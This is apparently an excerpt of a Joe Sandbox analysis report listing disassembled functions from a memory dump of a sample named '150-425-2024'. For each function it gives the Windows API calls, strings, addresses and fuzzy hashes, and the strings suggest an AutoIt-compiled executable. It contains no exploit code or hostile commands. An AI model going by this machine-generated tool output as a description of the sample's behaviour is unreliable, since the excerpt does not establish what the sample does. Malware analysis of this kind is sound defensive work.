WSAStartup.WSOCK32(00000101,?), ref: 00C35AA6
inet_addr.WSOCK32(?,?,?), ref: 00C35AEB
gethostbyname.WSOCK32(?), ref: 00C35AF7
IcmpCreateFile.IPHLPAPI ref: 00C35B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C35B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C35C00
WSACleanup.WSOCK32 ref: 00C35C06

Strings

Ping, xrefs: 00C35B29

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: cccf067628b0f2bb70af096dd6930833207be7b517686d42516ea7ffb41b1f7d
Instruction ID: be3ef30e53d8476fbfba2d1fd54f67406597c9dbb4aee6eb63c70127cd5f6845
Opcode Fuzzy Hash: cccf067628b0f2bb70af096dd6930833207be7b517686d42516ea7ffb41b1f7d
Instruction Fuzzy Hash: 9351AF316147009FD721AF25CC49F2EBBE4EF49714F048969F96ADB2A1DB70E940DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C27C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

Part of subcall function 00BC2344: GetCursorPos.USER32(?), ref: 00BC2357
Part of subcall function 00BC2344: ScreenToClient.USER32(00C867B0,?), ref: 00BC2374
Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000001), ref: 00BC2399
Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000002), ref: 00BC23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C4C2E4
ImageList_EndDrag.COMCTL32 ref: 00C4C2EA
ReleaseCapture.USER32 ref: 00C4C2F0
SetWindowTextW.USER32(?,00000000), ref: 00C4C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C4C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C4C48F

Strings

@GUI_DRAGFILE, xrefs: 00C4C424
@GUI_DROPID, xrefs: 00C4C3E1
@U=u, xrefs: 00C4C3AD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: ee97c762166520dd4895df6575ec08b2c5512dc568e7fd694f50e658a66283ca
Instruction ID: daae916e22a510761f5fbe58c8226bc571c4060cf0e933d840e9212722669302
Opcode Fuzzy Hash: ee97c762166520dd4895df6575ec08b2c5512dc568e7fd694f50e658a66283ca
Instruction Fuzzy Hash: C9518A74204204AFDB00EF24C895FAE7BE5FB88310F00856DF5958B2F1DB71A959CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C2B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C2B7B1
GetLastError.KERNEL32 ref: 00C2B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00C2B828

Strings

READONLY, xrefs: 00C2B7F3
INVALID, xrefs: 00C2B7FA
UNKNOWN, xrefs: 00C2B7E0
READY, xrefs: 00C2B801
NOTREADY, xrefs: 00C2B7E7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 2f897748ac28eafa4e678886eff06be17e7d76f3e3be61fa78de89f0263e6560
Instruction ID: 5cf4dcfc3a449db9bf23523ed95aab4b87f76c63951cf7b336c7887105e56b7e
Opcode Fuzzy Hash: 2f897748ac28eafa4e678886eff06be17e7d76f3e3be61fa78de89f0263e6560
Instruction Fuzzy Hash: FC31A035A002149FDB10EF64E885FAE77B4FF85B00F148069F515D7692DB71AE42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C46442 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C4645A
GetDC.USER32(00000000), ref: 00C46462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4646D
ReleaseDC.USER32(00000000,00000000), ref: 00C46479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C464B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C464C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C49299,?,?,000000FF,00000000,?,000000FF,?), ref: 00C46500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C46520

Strings

@U=u, xrefs: 00C464C6, 00C46520

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: f86e5227dec7e2eebdb9f0a6d372eb608fcec37a5bd34449d9edbd7d6bbdbaa3
Instruction ID: 7870c8427470923d3943ca7ab9d845164ab62a45cab119a29ff84744d1b38bfc
Opcode Fuzzy Hash: f86e5227dec7e2eebdb9f0a6d372eb608fcec37a5bd34449d9edbd7d6bbdbaa3
Instruction Fuzzy Hash: 5C318B76201214BFEB108F10CC8AFEB3FA9FF0A761F050069FE089A295C6759D42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C38BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C38BEC
CoInitialize.OLE32(00000000), ref: 00C38C19
CoUninitialize.OLE32 ref: 00C38C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00C38D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C38E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C52C0C), ref: 00C38E84
CoGetObject.OLE32(?,00000000,00C52C0C,?), ref: 00C38EA7
SetErrorMode.KERNEL32(00000000), ref: 00C38EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C38F3A
VariantClear.OLEAUT32(?), ref: 00C38F4A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: b223bd3bf28e773ad279197cbea75920afd369e3a11d89dbbb0d0e17ea76259e
Instruction ID: 4f16520712f62fffa07a31307d82f152223545172b455b95f0051696bb6abf62
Opcode Fuzzy Hash: b223bd3bf28e773ad279197cbea75920afd369e3a11d89dbbb0d0e17ea76259e
Instruction Fuzzy Hash: 31C135B1208305AFD700DF64C884A2BB7E9FF89748F00496DF59A9B251DB71ED4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C24189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C2419D
__swprintf.LIBCMT ref: 00C241AA

Part of subcall function 00BE38D8: __woutput_l.LIBCMT ref: 00BE3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C241D4
LoadResource.KERNEL32(?,00000000), ref: 00C241E0
LockResource.KERNEL32(00000000), ref: 00C241ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00C2420D
LoadResource.KERNEL32(?,00000000), ref: 00C2421F
SizeofResource.KERNEL32(?,00000000), ref: 00C2422E
LockResource.KERNEL32(?), ref: 00C2423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C2429B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 1f474608687dc27de901e4cf0df814c567beac9d25bc756ec663c91c643edf51
Instruction ID: 4b301e3705975e854434db9efc31cffd557b4cb66dda27d4ca6892860e9f8955
Opcode Fuzzy Hash: 1f474608687dc27de901e4cf0df814c567beac9d25bc756ec663c91c643edf51
Instruction Fuzzy Hash: 5231A07550122AABDB199F62EC48FBF7BACFF05301F004529F816D2550E7B0DA628BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00C216DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C21700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C20778,?,00000001), ref: 00C21714
GetWindowThreadProcessId.USER32(00000000), ref: 00C2171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20778,?,00000001), ref: 00C2172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20778,?,00000001), ref: 00C21755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C20778,?,00000001), ref: 00C21767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C20778,?,00000001), ref: 00C217AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20778,?,00000001), ref: 00C217C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C20778,?,00000001), ref: 00C217CC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6ff638209f389d48a04a93c5061f22d6d76f5e6ecd21664c53288a7b2a22d612
Instruction ID: cff34eb962d38fcea5dddc4bf4ff2d30a1570beb6bb9021b08ec1c3cc454917d
Opcode Fuzzy Hash: 6ff638209f389d48a04a93c5061f22d6d76f5e6ecd21664c53288a7b2a22d612
Instruction Fuzzy Hash: 6E31B175600314BBEB119F55EC88BAE37E9EBA6B11F254128FD10C66A0E7749E40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BCFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BCFC06
OleUninitialize.OLE32(?,00000000), ref: 00BCFCA5
UnregisterHotKey.USER32(?), ref: 00BCFDFC
DestroyWindow.USER32(?), ref: 00C04A00
FreeLibrary.KERNEL32(?), ref: 00C04A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C04A92

Strings

close all, xrefs: 00BCFC01

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ab4a0c6b61e4585b637b10eada1683376328297aee4b2599a99244a5ef4b779a
Instruction ID: a4e2370c5d32bb17722d09cd660eeba892c3cea4b50279770d29c3b9b79ffbaa
Opcode Fuzzy Hash: ab4a0c6b61e4585b637b10eada1683376328297aee4b2599a99244a5ef4b779a
Instruction Fuzzy Hash: CCA148747012128FCB29EF15C494F6AF7A5EF04700F1542EDE90AAB2A2DB30AD56DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C1AA64), ref: 00C1A9A2

Strings

INSTANCE, xrefs: 00C1A8B0
TEXT, xrefs: 00C1A8D9
CLASS, xrefs: 00C1A721
REGEXPCLASS, xrefs: 00C1A767
CLASSNN, xrefs: 00C1A744
NAME, xrefs: 00C1A7D4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1e70e5b5f47f4edd5c24693072b84ad1332fb437233313a85e6df1aeab644f1a
Instruction ID: 9af4bde66684785ded65e4235b50d4de38b5607ace2d1b0577993ff449cdeb86
Opcode Fuzzy Hash: 1e70e5b5f47f4edd5c24693072b84ad1332fb437233313a85e6df1aeab644f1a
Instruction Fuzzy Hash: 9291D570601146EBDB08EF61C481BEDFBB4FF06310F148169E899A3191DF306ADAEB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B60B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(015262D0), ref: 00C4B6A5
IsWindowEnabled.USER32(015262D0), ref: 00C4B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C4B795
SendMessageW.USER32(015262D0,000000B0,?,?), ref: 00C4B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00C4B809
GetWindowLongW.USER32(015262D0,000000EC), ref: 00C4B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C4B843

Strings

@U=u, xrefs: 00C4B795, 00C4B7CC, 00C4B843

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: @U=u
API String ID: 4072528602-2594219639
Opcode ID: 96c6a0a023e517bc906e9aa508ebd9cbb5bc24d24336bde79ef19609a1545611
Instruction ID: fab07b2aa314118d3b8304c48a3e25a4595be002da35c79796e087dbca66dac4
Opcode Fuzzy Hash: 96c6a0a023e517bc906e9aa508ebd9cbb5bc24d24336bde79ef19609a1545611
Instruction Fuzzy Hash: 05718D74A00204AFDF289F64C894FEA7BB9FF4A300F154069F965972A1C731EE41DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C46FEF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C47093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C470A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C470C1
_wcscat.LIBCMT ref: 00C4711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C47133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C47161

Strings

@U=u, xrefs: 00C47093, 00C470A7
SysListView32, xrefs: 00C47065

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: @U=u$SysListView32
API String ID: 307300125-1908207174
Opcode ID: c3ebde9d31683fd83a7962fb6ed4f3f46406fba8cf3d02abb471664394b5e9d9
Instruction ID: 0bb3c3082d78655ee59997dad4814243a99e7e21950854151ad06acdf4b9481e
Opcode Fuzzy Hash: c3ebde9d31683fd83a7962fb6ed4f3f46406fba8cf3d02abb471664394b5e9d9
Instruction Fuzzy Hash: 3841B271904308AFEB219F64CC85BEE77F8FF08350F10056AF559A7192D7729D858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C4653C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C4655B
GetWindowLongW.USER32(015262D0,000000F0), ref: 00C4658E
GetWindowLongW.USER32(015262D0,000000F0), ref: 00C465C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C465F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C4661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00C46630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C4664A

Strings

@U=u, xrefs: 00C4655B, 00C465F5, 00C4661F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: @U=u
API String ID: 2178440468-2594219639
Opcode ID: abbcd8c2104db3fe67c16a02d4035b30597c2e2f029a85490e8cd5de99f79d4f
Instruction ID: d46805de50dd607fd7408fb5ec2de7329c3ebb1ce16568709287469ba93d8ac6
Opcode Fuzzy Hash: abbcd8c2104db3fe67c16a02d4035b30597c2e2f029a85490e8cd5de99f79d4f
Instruction Fuzzy Hash: 71310634604154AFDB21CF18EC85F9937E1FB4A760F190168F9258B2BACB71AD40DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C38F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C4F910), ref: 00C3903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C4F910), ref: 00C39071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C391EB
SysFreeString.OLEAUT32(?), ref: 00C39215

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: d6ee6e945e4212e948c336b3ad76c5c227eaf72ff97651aa627a0239b62938a2
Instruction ID: ea6bded61884b5f3194119636b6c232bfcd59cbcd9ba6a5fe25ca840759e3d30
Opcode Fuzzy Hash: d6ee6e945e4212e948c336b3ad76c5c227eaf72ff97651aa627a0239b62938a2
Instruction Fuzzy Hash: 5CF13E75A10209EFDF04DF94C888EAEB7B9FF49314F108099F516AB261DB71AE46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C3FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C3FD90
CloseHandle.KERNEL32(?), ref: 00C3FDBF
CloseHandle.KERNEL32(?), ref: 00C3FE36

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 355674b4a3c0ac71f16093314eac6a7c361ca186a18f14471d5f2cadc99666f4
Instruction ID: 5774cf00c7180a7e752e959567b38021e0f1c8d0184333e5ef5da7b587bc4070
Opcode Fuzzy Hash: 355674b4a3c0ac71f16093314eac6a7c361ca186a18f14471d5f2cadc99666f4
Instruction Fuzzy Hash: F7E1C231604341DFDB14EF24D495B6ABBE0AF85314F1488ADF89A8B3A2DB30DD46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C24F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C238D3,?), ref: 00C248C7

Part of subcall function 00C248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C238D3,?), ref: 00C248E0

Part of subcall function 00C24CD3: GetFileAttributesW.KERNEL32(?,00C23947), ref: 00C24CD4

lstrcmpiW.KERNEL32(?,?), ref: 00C24FE2
_wcscmp.LIBCMT ref: 00C24FFC
MoveFileW.KERNEL32(?,?), ref: 00C25017

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

